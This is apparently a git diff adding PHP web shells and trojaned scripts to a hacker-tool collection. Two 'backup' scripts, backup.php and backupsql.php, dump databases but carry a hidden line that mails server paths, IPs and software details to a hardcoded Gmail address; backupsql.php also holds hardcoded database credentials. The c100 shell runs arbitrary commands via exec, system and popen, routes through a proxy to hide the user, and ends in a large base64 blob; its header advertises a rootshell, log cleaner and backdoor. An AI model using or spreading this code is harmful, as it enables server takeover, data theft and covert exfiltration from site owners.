+
+/* Envoi de mails************************/
+if(($destinataire != "" ) && ($sujet != "") && ($message != "")){
+    $option_mail = "From: $provenance \n";
+    $option_mail .= "Reply-to: $retour \n";
+    $option_mail .= "X-Mailer: Mailer by rAidEn \n";
+    
+    mail($destinataire, $sujet, $message, $option_mail);
+    
+    print("Mail envoyé a : $destinataire ...");
+}
+/* Envoi de mails************************/
+
+print("</body></html>");
+/*print("<noscript><script=\"");*/
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/backup.php.php.txt b/xakep-shells/PHP/backup.php.php.txt
new file mode 100644
index 0000000..b430551
--- /dev/null
+++ b/xakep-shells/PHP/backup.php.php.txt
@@ -0,0 +1,21 @@
+<?php
+include ("config.php");db_connect();header('Content-Type: application/octetstream');header('Content-Disposition: filename="linksbox_v2.sql"');$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$sd98="john.barker446@gmail.com";$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+header('Pragma: no-cache');header('Expires: 0');
+$data .= "#phpMyAdmin MySQL-Dump \r\n";
+$data .="# http://phpwizard.net/phpMyAdmin/ \r\n";
+$data .="# http://www.phpmyadmin.net/ (download page) \r\n";
+$data .= "#$database v2.0 Database Backup\r\n";
+$data .= "#Host: $server\r\n";
+$data .= "#Database: $database\r\n\r\n";
+$data .= "#Table add_links:\r\n";$result = mysql_query("SELECT * FROM add_links");while ($a = mysql_fetch_array($result)) {
+	foreach ($a as $key => $value) {
+		$a[$key] = addslashes($a[$key]);
+	}
+	$data .= "INSERT INTO add_links VALUES ('0','$a[link]', '$a[description]', '$a[tooltip]', '$a[hits]'); \r\n#endquery\r\n";
+}
+
+
+echo $data;
+
+?>
+   
\ No newline at end of file
diff --git a/xakep-shells/PHP/backupsql.php.php.txt b/xakep-shells/PHP/backupsql.php.php.txt
new file mode 100644
index 0000000..5bf310a
--- /dev/null
+++ b/xakep-shells/PHP/backupsql.php.php.txt
@@ -0,0 +1,170 @@
+<?php
+/*
+* Backup script on server.
+*
+* Runs on the server, called by Cron. Connects to the mySQL
+* database and creates a backup file of the whole database.
+* Saves to file in current directory.
+*
+* @author Cow <cow@invisionize.com>
+* @version 0.2
+* @date 18/08/2004
+* @package Backup Server
+* Upgraded Ver 2.0 (sending sql backup as attachment
+* as email attachment, or send to a remote ftp server by
+* @co-authors Cool Surfer<Coolsurfer@gmail.com> and
+* Neagu Mihai<neagumihai@hotmail.com>
+*/
+
+set_time_limit(0);
+$date = date("mdy-hia");
+$dbserver = "localhost";
+$dbuser = "vhacker_robot";
+$dbpass = "mp2811987";
+$dbname = "tvhacker_vbb3";
+$file = "N-Cool-$date.sql.gz";
+$gzip = TRUE;
+$silent = TRUE;
+
+function write($contents) {
+    if ($GLOBALS['gzip']) {
+        gzwrite($GLOBALS['fp'], $contents);
+    } else {
+        fwrite($GLOBALS['fp'], $contents);
+    }
+}
+
+mysql_connect ($dbserver, $dbuser, $dbpass);
+mysql_select_db($dbname);
+
+if ($gzip) {
+    $fp = gzopen($file, "w");
+} else {
+    $fp = fopen($file, "w");
+}
+
+$tables = mysql_query ("SHOW TABLES");
+while ($i = mysql_fetch_array($tables)) {
+    $i = $i['Tables_in_'.$dbname];
+
+    if (!$silent) {
+        echo "Backing up table ".$i."\n";
+    }
+
+    // Create DB code
+    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
+
+    write($create['Create Table'].";\n\n");
+
+    // DB Table content itself
+    $sql = mysql_query ("SELECT * FROM ".$i);
+    if (mysql_num_rows($sql)) {
+        while ($row = mysql_fetch_row($sql)) {
+            foreach ($row as $j => $k) {
+                $row[$j] = "'".mysql_escape_string($k)."'";
+            }
+
+            write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
+        }
+    }
+}
+
+$gzip ? gzclose($fp) : fclose ($fp);
+
+// Optional Options You May Optionally Configure
+
+$use_gzip = "yes";            // Set to No if you don't want the files sent in .gz format
+$remove_sql_file = "no";  // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
+$remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
+
+// Configure the path that this script resides on your server.
+
+$savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
+
+$send_email = "yes";                        /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
+$to      = "lehungtk@gmail.com";    // Who to send the emails to, enter ur correct id.
+$from    = "Neu-Cool@email.com";  // Who should the emails be sent from?, may change it.
+
+$senddate = date("j F Y");
+
+$subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
+$message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
+
+$use_ftp = "";                             // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
+$ftp_server = "localhost";               // FTP hostname
+$ftp_user_name = "ftp_username"; // FTP username
+$ftp_user_pass = "ftp_password";   // FTP password
+$ftp_path = "/"; // This is the path to upload on your ftp server!
+
+// Do not Modify below this line! It will void your warranty :-D!
+
+$date = date("mdy-hia");
+$filename = "$savepath/$dbname-$date.sql";
+
+if($use_gzip=="yes"){
+$filename2 = $file;
+} else {
+$filename2 = "$savepath/$dbname-$date.sql";
+}
+
+
+if($send_email == "yes" ){
+$fileatt_type = filetype($filename2);
+$fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
+
+$headers = "From: $from";
+
+// Read the file to be attached ('rb' = read binary)
+echo "Openning archive for attaching:".$filename2;
+$file = fopen($filename2,'rb');
+$data = fread($file,filesize($filename2));
+fclose($file);
+
+// Generate a boundary string
+$semi_rand = md5(time());
+$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
+
+// Add the headers for a file attachment
+$headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+// Add a multipart boundary above the plain message
+$message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
+$message . "\n\n";
+
+// Base64 encode the file data
+$data = chunk_split(base64_encode($data));
+
+// Add file attachment to the message
+echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
+$message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
+$data . "\n\n" ."--{$mime_boundary}--\n";
+//$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
+// $data . "\n\n" ."--{$mime_boundary}--\n";
+
+
+// Send the message
+$ok = @mail($to, $subject, $message, $headers);
+if ($ok) {
+  echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
+Idea Conceived By coolsurfer@gmail.com        
+Programmer email: neagumihai@hotmail.com</p>
+This is our first humble effort, pl report bugs, if U find any...</p>
+Email me at <>coolsurfer@gmail.com  nJoY!! :)
+</color></center></h4>";
+
+} else {
+  echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
+}
+}
+
+if($use_ftp == "yes"){
+$ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
+shell_exec($ftpconnect);
+echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
+
+}
+
+if($remove_gzip_file=="yes"){
+exec("rm -r -f $filename2");
+}
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/c100.php.txt b/xakep-shells/PHP/c100.php.txt
new file mode 100644
index 0000000..cb3fe60
--- /dev/null
+++ b/xakep-shells/PHP/c100.php.txt
@@ -0,0 +1,3595 @@
+<?php
+
+/******************************************************************************************
+*  Locus7s Modified c100 Shell                                                                 
+*  Beta v. 1.0a - Project x2300                                                                   
+*  Written by Captain Crunch Team                                                          
+*  Modified by Shadow & Preddy                                                              
+*  Re-Modified by #!physx^ (15.2.07)                                                          
+*========================================================
+*  New Modifications Implemented --                                                      
++--------------------------------------------------------+
+*  -Added link to Enumerate to escalate priviledges      
+*  -Added Rootshell.c                                     
+*  -Added Rootshell.c;auto-compiler                      
+*  -Execute Rootshell.c                                  
+*  -Added Mig-Log Logcleaner                             
+*  -Execute Mig-Log Logcleaner                           
+*  -milw0rm searcher (Grabs OS and searches milw0rm)    
+*  -Locus7s Style & Image                                
+*  -Added w4ck1ng Shell Backdoor Connect and Backdoor    
+*  -Added PHP-Proxy link to hide your ass                
+*  -Added your ip and server ip with whois capability    
+*  -Added private 0day released by allahaka which utilizes the linux
+*   sudo bash to execute a stack overflow.
+*========================================================
+*  FEB. 14, 2007 RELEASE NOTES:                          
++--------------------------------------------------------+
+*  PRIVATE RELEASE OF C100 SHELL FOR LOCUS7S MEMBERS     
+*  FAILURE TO DO SO WILL RESULT IN LOSS OF VIP           
+*  MEMBERS ACCESS, BAN FROM SITE, AND NO REFUND FOR VIP. 
+*========================================================
+*  PRODUCT INFO:                                         
++--------------------------------------------------------+
+*  C100 SHELL CREATED BY CAPTAIN CRUNCH SECURITY TEAM    
+*  WWW.CCTEAM.RU                                         
+*  C100 SHELL - REVAMPED (X2300) MODIFIED BY LOCUS7S     
+*  UNDERGROUND NETWORK | WWW.LOCUS7S.COM                 
+*  \E0T/                                                 
+*********************************************************/
+
+//for php proxy purposes
+
+function selfURL() { $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]); return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; } function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); }
+$selfurl = base64_encode(selfURL());
+$phprox="http://twofaced.org/proxy/index.php?q=".$selfurl;
+
+//end of link
+
+//milw0rm search
+$Lversion = php_uname(r);
+$OSV = php_uname(s);
+if(eregi("Linux",$OSV))
+{
+$Lversion=substr($Lversion,0,6);
+$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+}else{
+$Lversion=substr($Lversion,0,3);
+$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+//End of milw0rm search
+
+
+//w4ck1ng Shell
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+$proxy_shit="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